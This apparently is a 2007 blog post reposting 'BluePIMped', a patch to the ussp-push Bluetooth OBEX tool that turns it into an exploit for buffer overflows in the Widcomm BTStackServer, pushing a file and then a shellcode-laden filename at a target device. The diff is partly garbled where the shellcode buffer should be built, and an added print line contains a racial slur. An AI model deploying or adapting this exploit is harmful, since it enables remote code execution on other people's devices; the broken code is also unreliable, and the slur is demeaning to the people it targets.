BluePIMped

Patch for ussp-push that allows you to exploit the overflows discovered in the Widcomm BTStackServer.

— ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
/*
+ http://www.digitalmunition.com
+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest.
+ http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
* UNrooted.net example code
*
* Most of these functions are just rips from the Affix Bluetooth project OBEX
@@ -62,7 +68,10 @@

#include “obex_socket.h”

-#define UPUSH_APPNAME “ussp-push v0.4”
+#include
+#include
+
+#define UPUSH_APPNAME “BluePIMped v0.1”
#define BT_SERVICE “OBEX”
#define OBEX_PUSH 5

@@ -316,6 +325,9 @@
switch (event) {
case OBEX_EV_PROGRESS:
printf(“Made some progress…\n”);
+ sleep(3);
+ printf(“Peace nigga…\n”);
+ exit(0);
break;

case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
name = remote;

name_len = (strlen(name)+1)\Name with shellcode
+ if ( obex_push( (void *)argv[1], “/etc/hosts”, “YouAreBeingPwnedViaBlueTooth”) != 0 ) {
+ printf( “error\n” );
+ return( -1 );
+ }
+ printf(“\nsleeping 3 seconds before triggering the shellcode\n”);
+ sleep(3);
+ if ( obex_push( (void *)argv[1], “/etc/hosts”, buf ) != 0 ) {
printf( “error\n” );
return( -1 );
}

Advertisements

~ by Balle on July 6, 2007.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: